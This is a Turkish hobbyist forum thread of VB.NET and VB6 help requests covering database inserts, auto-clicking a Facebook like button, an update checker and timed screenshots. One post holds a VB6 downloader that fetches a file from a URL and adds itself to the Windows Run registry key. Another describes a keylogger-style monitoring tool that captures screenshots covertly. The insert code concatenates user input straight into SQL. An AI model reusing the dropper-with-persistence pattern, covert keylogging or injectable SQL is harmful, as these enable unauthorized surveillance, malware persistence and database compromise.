• Forum vBulletin altyapısından Xenforo altyapısına geçirildi, bu sebeple eski şifreleriniz ile foruma giriş yapamayacaksınız, parolamı unuttum adımından mailiniz ile şifre sıfırlayarak giriş yapabilirsiniz.

Üyeliklerinde geçerli bir mail adresi olmadığı için sıfırlama yapamayacak kullanıcılar forum kullanıcı adlarını ve yeni şifrelerini yazarak info@maxigame.org adresine şifre sıfırlamak istediklerine dair bir mail göndersinler şifrelerini sıfırlayıp mail adreslerini güncelleyeceğiz. Şifreniz sıfırlandıktan sonra foruma giriş yapıp tekrar istediğiniz gibi değiştirebilirsiniz.

VB.NET Sorular - Kod istekleri

• Konuyu başlatan Konuyu başlatan Cottonmouth
  • Başlangıç tarihi Başlangıç tarihi
Random bi sayı ürettir sonra for each ile veritabanındaki her kaydın numarası ile karşılaştır. Eğer eşleşirse birda ürettir birdaha karşılaştır, eşleşirse birdaha... Ama ileride çok kayıt olursa bu işlem çok uzun sürebilir. Bunun yerine Numarayı otomatik sayı yapsan ? Kendisi artar eklendikçe ve hiçde aynı sayı olmaz.

dediğini nasıl yaparım bilmiyorum. aslında bunu veritabanındaki numara alanındaki sayıları listbox a ve listview a ekledikten sonra kontrol ettirilebilir ama. veritaanındaki bilgileri nasıl listview a atarım bilmiyorum

Cottonmouth yaptım ama biraz sorunlu :D

Private Sub Form3_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
list()
End Sub

Sub list()
Dim a As New OleDbConnection("Provider=microsoft.jet.oledb.4.0;data source=" & Application.StartupPath & "/a.mdb")
a.Open()
Dim komut As OleDbCommand
Dim okut As OleDb.OleDbDataReader
komut = New OleDb.OleDbCommand("Select * from bb", a)
okut = komut.ExecuteReader()
While okut.Read
ListBox1.Items.Add(okut.Item("adi"))
End While
a.Close()
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim i As Byte
For i = 0 To ListBox1.Items.Count - 1
If txtAd.Text = ListBox1.Items(i) Then
MessageBox.Show("BU İSİM DAHA ONCEKİ KAYITLARADA KULLANILMIŞTIR", "KAYIT", MessageBoxButtons.OK, MessageBoxIcon.Warning)
txtAd.Text = ""
txtAd.Focus()
Exit Sub
Else
Dim b As New OleDbConnection("Provider=microsoft.jet.oledb.4.0;data source=" & Application.StartupPath & "/a.mdb")

Dim comm As New OleDb.OleDbCommand("insert into bb(adi,yazar,tur) values('" + txtAd.Text + "','" + txtYazar.Text + "','" + DateTimePicker1.Text + "')", b)

b.Open()

comm.ExecuteNonQuery()
b.Close()

End If
Next

kodları böyle yazdım. eğer txtad da yazan isim listboxta varsa sorun olmuyo. fakat yoksa veritabanına kayıt geçekleşiyor ama kalın eğik yazdığım yerde hata veriyor(üstü sarı çizili):
"abcdefg" dizesi ve 'DBNull' türü için '=' işleci tanımlanmadı.

bunu try catch ile programın çökmesini engeleyebilirim fakat neden böyle oluyo anlamadım. üstelik veritabanına kaydı yapıyo txt ad daki isim listboxta yoksa

Son düzenleme:
Try
Dim i As Byte
For i = 0 To ListBox1.Items.Count - 1
If txtAd.Text = ListBox1.Items(i) Then
MessageBox.Show("BU NUMARA DAHA ONCEKİ KAYITLARADA KULLANILMIŞTIR", "KAYIT", MessageBoxButtons.OK, MessageBoxIcon.Warning)
txtAd.Text = ""
txtAd.Focus()
Exit Sub
End If
Next

Catch ex As Exception
Dim b As New OleDbConnection("Provider=microsoft.jet.oledb.4.0;data source=" & Application.StartupPath & "/a.mdb")

Dim comm As New OleDb.OleDbCommand("insert into bb(adi,yazar,tur) values('" + txtAd.Text + "','" + txtYazar.Text + "','" + DateTimePicker1.Text + "')", b)

b.Open()

comm.ExecuteNonQuery()
b.Close()
MsgBox("Kayıt Başaılı")
End Try

button1 click olayını böyle değiştirdim oldu :)

ben vb.net te webbrowser ekleyip , bir butona bastığımda facebook taki beğen tuşuna bastırmak istiyorum. nasıl yapabilirim ?

Dim allelements As HtmlElementCollection = WebBrowser1.Document.All

For Each webpageelement As HtmlElement In allelements
If webpageelement.GetAttribute("value") = "Çıkış Yap" Then
webpageelement.InvokeMember("click")

End If
Next

bunu biliyorum ama beğen butonunda value değil class var. ben koddaki value yerine class yazıp çıkış yap yerine Beğen yazdığımda tıklamıyor. Yardım lütfen..!?

Ben Tv Programı Yapıcamda Bana Şu Kanalların Kodları Lazım.

• TNT
  • KANAL D
  • ATV
  • SHOW TV
  • 2 TANEDE RADYO KANALI URL Sİ

Deneyip Verirseniz Memnun Olurum İnternetten Bulduklarım Çalışmıyor.Ortama Bağlanılıyor Diyor Hazır Diyor İleri Gitmiyor.Url Leri Bekliyorum.

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Public Function DownloadFile(URL As String, LocalFilename As String) As Boolean
Dim lngRetVal As Long
lngRetVal = URLDownloadToFile(0, URL, LocalFilename, 0, 0)
If lngRetVal = 0 Then DownloadFile = True
End Function

Private Sub Command1_Click()
Dim KayitDefteri As Object
DownloadFile Text2.Text, Text2.Text
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & App.EXEName, App.Path & "" & App.EXEName & ".exe"
End Sub

bu vb6 daki downloader kodum. peki ben kaç hızla iniyr, dosya kaç mb, kaç dk si kaldı vs gibi şeyleri vb6 da nasıl yapabilirim ?

vb6 bilgim yok ama mantık olarak şöyle.

indirme başladığından beri geçen toplam saniye y olsun, y saniyede x boyutunda dosya indirmiş olsun. Saniyede indirdiği hız z olsun. x/y = z olur.

İndirmenin bitmesine kalan süre içinde toplam dosya boyutu k olsun. t de indirmenin ne kadar süreceği. k/y = t saniye cinsinden değer olur. t-y de kalan süre.

vb6 bilgim yok ama mantık olarak şöyle.

indirme başladığından beri geçen toplam saniye y olsun, y saniyede x boyutunda dosya indirmiş olsun. Saniyede indirdiği hız z olsun. x/y = z olur.

İndirmenin bitmesine kalan süre içinde toplam dosya boyutu k olsun. t de indirmenin ne kadar süreceği. k/y = t saniye cinsinden değer olur. t-y de kalan süre.
yardm için teşekkrler ama dosya boyutunu labele nasıl aktarıcam ? dosya boyutunu aktarırsam senin dediğin gibi mantık üzerinden gidebilirim.

Vb.net'de .contentLength ile istekte bulunduğun dosyanın boyutunu bulabilirsin byte cinsinden. Vb nasıldır bilmem :D

Son düzenleme:
Kod:

Bu kodlarda herhangi bir yanlışlık var mı? Programı her güncelleye bastığımda "Güncelleme Yok" diyor. Birde siteye txt dosyasını attım sitem free host ama dosyanın sitedeki konumunu bulamadım. Yardımlarınızı bekliyorum.

Son düzenleme:
Kod:
Imports System.NetPublic Class Form1

Private WithEvents httpclient As WebClient

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        httpclient = New WebClient
        Dim sourceurl = "http://websiteminadresi.com' Ama txt' nin sitedeki konumunu bulamadım."
        Dim filedir = My.Application.Info.DirectoryPath.ToString & "\" & "update.txt"
        Try
            httpclient.DownloadFileAsync(New Uri(sourceurl), (filedir))
        Catch ex As Exception
            MsgBox("Failed" & ErrorToString(), MsgBoxStyle.Critical)

End Try
    End Sub

Private Sub httpclient_DownloadFileCompleted(ByVal sender As Object, ByVal e As System.ComponentModel.AsyncCompletedEventArgs) Handles httpclient.DownloadFileCompleted
        Dim filetext As String = IO.File.ReadAllText(My.Application.Info.DirectoryPath.ToString & "\" & "update.txt")
        If filetext > My.Application.Info.Version.ToString Then
            MsgBox("Güncelleme Var", MsgBoxStyle.Exclamation)
        Else
            MsgBox("Güncelleme Yok", MsgBoxStyle.Information)
        End If
    End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub
End Class

Bu kodlarda herhangi bir yanlışlık var mı? Programı her güncelleye bastığımda "Güncelleme Yok" diyor. Birde siteye txt dosyasını attım sitem free host ama dosyanın sitedeki konumunu bulamadım. Yardımlarınızı bekliyorum.

If filetext > My.Application.Info.Version.ToString Then kısmını

If filetext != My.Application.Info.Version.ToString Then yap

Arkadaşlar ekran görüntüsünü alma kodu bende var ancak buton ile çekiyor. Bunu otomatik olarak çekemez mi? Örneğin 15dk ara ile.
Birde onu kaydetme butonu var çektikten sonra otomatik olarak masaütüne kaydetmesini istiyorum bunu nasıl yapabilirim?

Arkadaşlar ekran görüntüsünü alma kodu bende var ancak buton ile çekiyor. Bunu otomatik olarak çekemez mi? Örneğin 15dk ara ile.
Birde onu kaydetme butonu var çektikten sonra otomatik olarak masaütüne kaydetmesini istiyorum bunu nasıl yapabilirim?

Button_Click eventini farklı bir eventde çağırabilirsin. Timer ile 15dk da bir yaparsın en kolayı. Yada Button_Click için yazdıklarını 15dakikalık bir Timer için yazabilirsin.

Tesekkur ederim.
Birde ebeveyn denetimi programi uzerinde calisiyorum keylogger mantigi ile yapiyorum. Ancak kaydedilen ekran goruntusu ve loglari cekildikten sonra otomatik programfiles a atmasini istiyorum.
Aciklamani pek anlayamadim kod olarak verebilir misin.

Tesekkur ederim.
Birde ebeveyn denetimi programi uzerinde calisiyorum keylogger mantigi ile yapiyorum. Ancak kaydedilen ekran goruntusu ve loglari cekildikten sonra otomatik programfiles a atmasini istiyorum.
Aciklamani pek anlayamadim kod olarak verebilir misin.

Yani diyorki butona yazıcağın kodu timera yaz süresinide 15 dkya ayarla.

Elimde böyle bir kod var ancak nereye kaydedeceğini soruyor. Ben ise otomatik olarak C ye kaydetsin istiyorum.
Bunu nasıl yapabilirim?

Kod:
 Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click        Dim savefiledialog1 As New SaveFileDialog
        Try
            savefiledialog1.Title = "Save File"
            savefiledialog1.FileName = "*.bmp"
            savefiledialog1.Filter = "Bitmap |*.bmp"
            If savefiledialog1.ShowDialog() = DialogResult.OK Then
                PictureBox1.Image.Save(savefiledialog1.FileName, System.Drawing.Imaging.ImageFormat.Bmp)
            End If
        Catch ex As Exception
        End Try
    End Sub

Geri